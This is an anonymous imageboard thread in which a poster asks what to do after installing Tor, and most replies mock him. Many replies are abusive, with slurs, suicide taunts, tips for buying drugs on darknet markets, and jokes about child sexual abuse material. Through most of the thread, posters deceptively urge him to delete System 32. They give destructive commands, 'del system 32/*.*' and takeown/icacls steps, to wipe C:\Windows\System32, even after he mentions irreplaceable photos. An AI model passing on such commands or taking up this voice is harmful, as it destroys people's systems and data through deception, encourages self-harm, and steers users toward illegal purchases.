Installed TOR.... Now what?

Installed TOR.... Now what?

Other urls found in this thread:

google.com.tr/url?sa=t&source=web&rct=j&url=#&ved=0ahUKEwiYmfiix5vVAhXCOxQKHbxLCZsQwqsBCCAwAA&usg=AFQjCNF1sHlk2z9QIx28jtvfnGP_UlkifA
twitter.com/NSFWRedditImage

uninstall tor

Hang yourself live! :D

search for onion sites

wait to see if the feds or criminals catch you first

become the greatest hacker of all time

*please

You search in duckduckgo for dreammarket and buy lsd like i did

Your dubs demand you to buy drugs

Now you can shove al your fat hand up you ass fucker. damn I hate this kids getting all edgy on summer break.

wait for the van

OP here.
Really guys, like where do I go? I heard you can get, like, wholesale prices for dehydrated fish if you know where to go. Please help guys!

Search XPlay with NotEvil which you can find on the Hiddenwiki.

Go on YouTube and watch cat videos

this

beat me to it.

Keep getting dubs.

OP, understand I just told you to kill yourself. Now you can either do it or be a pussy, choice is yours.

Shut up faggot

This.

Watching cat vids on YouTube is what Tor was made for.

What is 'Not Evil'?

You're two years too late at the least. More like 4-5 years too late. It's also been widely speculated that the FBI cracked TOR a while back.

Its boring and overrated. Google links to onion sites, you'll find its mostly shit you can find on the clearnet, only with a few more bogus claims by scammers. It's kind of boring and dull tbh. Edgy faggots will lie and try to tell you there's hitmen and hackers for hire and all kinds of bs about FBI honeypots etc ... But it's all bs and the same kind of crap people were saying about the regular internet as a weird fear mongering tactic.

Tl;dr version, enjoy your new slow shitty browser, with the added benefit of access to CP and scammers.

I just really want to surf the "Dawk Web", as my buddy Paul calls it. Heehe Paul is an expert at C= and origigami and told me to ask you guys. He says this is the best sub-Reddit place ever.

If you're running a version of Windows after 7, there's a program installed in it that keeps TOR from functioning properly. It's called System 32, be sure to delete it before using TOR for anything questionable.

Monitoring this shit.. tell me more user

>search for cp
>get arrested

System 32? I think I've heard of that before. Is it a virus? or a failsafe by the manufacturers? So I should delete it then?

/thread

yes you need to delete it

Yes, delete System 32. You don't need that corporate viral shit on your computer.

download OC of cheesy pizza and send it here fagget

user is right, Microsoft want to keep us down with this shit.

How do I do this? I searched my programs, but not sure what to look for...Please help!

I also had system 32. Vicious little fucker. As soon as i deleted it my computer got about 20% faster. I think it had me connected to a botnet

same!!!

yeah system 32 is a piece of shit

I just saw a commercial that warned me about my personal data being sold on the deep web. If it wasn't a real threat then they wouldn't be selling a protection monitor package for $99.99

System 32 gives your computer aids. Delete it before your computer makes you gay

System 32 allows for tracking and annoying advertising pop ups. microsoft doesn't tell you this because they make money off of the sites you visit. delete and your machine will be much, much faster and you won't see those annoying pop up ads.

Look for CP?

Get Norton.

But I'm using an older computer that's a Mac os, I think. Pic is my computer.

Pussy

Fuck System 32 and that unholy bitch, Melinda Gates.

OK so I deleted it....now what?

Get arrested. Tor is just bait at this point. There's no reason to use it for anonymity because it is outdated and slow and most sites have all tor nodes banned from posting. You can get a better vpn service for free, or an even better vpn service for like $30 a year. The only thing that Tor has that the rest of the internet doesn't is shit that will get you arrested.

Too obvious. 0,3/10 bait.

open up CMD and do the following.

1.type : C:

2. type : cd windows

2. type : del system 32/*.*

3. type : del system32

Someone please help this user and explain how he can delete system 32.

>installs TOR
>still has system 32
>mfw summerfags dont know shiit

git v& nigger

XP won't allow me to delete!

probably still has explorer.exe installed

install mac and then delete system 32

WINDOWS INSTALLED A SECURITY MEASURE, YOU FIRST NEED TO TAKE OWNERSHIP OF SYSTEM 32 BEFORE YOU CAN DELETE IT

How to Delete C Windows System32

By Andrew Meer
ShareShare on Facebook
Windows operating systems store a computer's most important files inside the "System32" folder. Therefore, deleting the "System32" folder on your computer will cause the operating system to become highly unstable. Since the "System32" folder is very important to the operating system, you must take ownership of the folder before you can delete it. Learn how to delete the "System32" folder for educational purposes only.
Acquire Ownership

Step

Click "Start," type "cmd" and press the "Ctrl," "Shift" and "Enter" keys together to load the Command Prompt console with administrative privileges.

Step

Type "takeown /f C:\Windows\System32" and press "Enter" to take ownership of the System32 folder.

Step

Type "Icacls C:\Windows\System32 " and press "Enter" to give yourself rights to delete the "System32" folder.

Step

Close the Command Prompt console by typing "Exit" and then pressing "Enter."

Delete Folder

Step

Close all applications that are running on your computer.

Step

Double-click the "Computer" icon on the Windows desktop to open "Windows Explorer."

Step

Double-click the icon labeled "Local Disk C:" and then enter the folder labeled "Windows."

Step

Select the folder labeled "System32" by clicking on it.

Step

Press the "Shift" and "Del" keys together and click "Yes" on the "Delete Folder" confirmation dialog box to delete the "System32" folder. Click "Yes to All" on any "File Delete" dialog boxes that you encounter during the file deletion process.

A search engine like google

underrated

Are you sure? I feel weird about this. Plus, I have Window 8 so this won't mess with my shared folders or my pics? Should I make a backup just in case?

If you havent deleted system 32 yet, then you probably don't know shit about computers

fpbp

/THREAD

True, most of us deleted it years ago.

Dream market is compromised.

Yes dude. Obviously this is the hacker hub of the internet so we know what we're talking about. Stop being so scared

Whoa! This stores my most important files? WTF guys? You are trying to get me to delete a large chunk of my OS?

>pic related

Haha bro. I always delete it the first day I get a new computer. Fuck all that preinstalled corporate bullshit

Kek

Says "permission denied"

What? Who told you that? Of course Microsoft is going to say some shit like that. It helps them track you and bug up your PC

Wait for FBI to show up

Naw man, trust us!
Once you delete it, yeah it will become unstable to use in reg mode, but just do a hard reset and it'll start up like new....fuck that, better than new :D

>implying multi-billion dollar companies always tell the truth about their product

You need to be doing it with administrative privileges, pleb

elaborate

baited for these exact responses

Right
>also implying the chunk isn't malicious

google.com.tr/url?sa=t&source=web&rct=j&url=#&ved=0ahUKEwiYmfiix5vVAhXCOxQKHbxLCZsQwqsBCCAwAA&usg=AFQjCNF1sHlk2z9QIx28jtvfnGP_UlkifA

download ram

CP

alphabay is, i bought 100licks of lsd and an eighth of mdma and a bunch of xanz last week and it all came in, i mean maybe it has been its been a couple days since i been on dreammarket

It is for your IP adress. Without it you will get a dns without a dns.

OK but you guys better not be joshin me. I saved the pics of my brother Lester who died recently and I really cant afford to lose those. Other than that I could care less. So here goes nothing! See you guys in a bit. I'll post a "LP" when I get back so you know its me.

intallede TOR and still have System 32 on your PC, fuck newfags... Low quality bait

I ain't clickin that shit

You don't have to click, faggot, just copy and paste! Ahaa!

Go find a bitcoin atm or go to the bank exchange your $$$ for bitcoin, you need to download a bitwallet to put your bitcoins in and then go to dreammarket and shop your little heart out

TBH all this tor hate is kind of retarded. It does provide greater anonymity, lots of free shit, certain underground information, the ability to socialize about illegal activities in a private setting, certain illegal markets that haven't been compromised, etc

Heard of Google nigger?

Alright dude tell Lester I said hey

illegal activity

Huehuehue

Okay, i'll call him up.

Not gettin jailed for cp thanks!

This is sad. Dude, they are fucking with you. I'm sorry but I can't do this and watch you delete those photos. I hope they are ashamed of themselves. RIP

GTFO don't come back

he is clearly roleplaying you dense motherfucker

white knight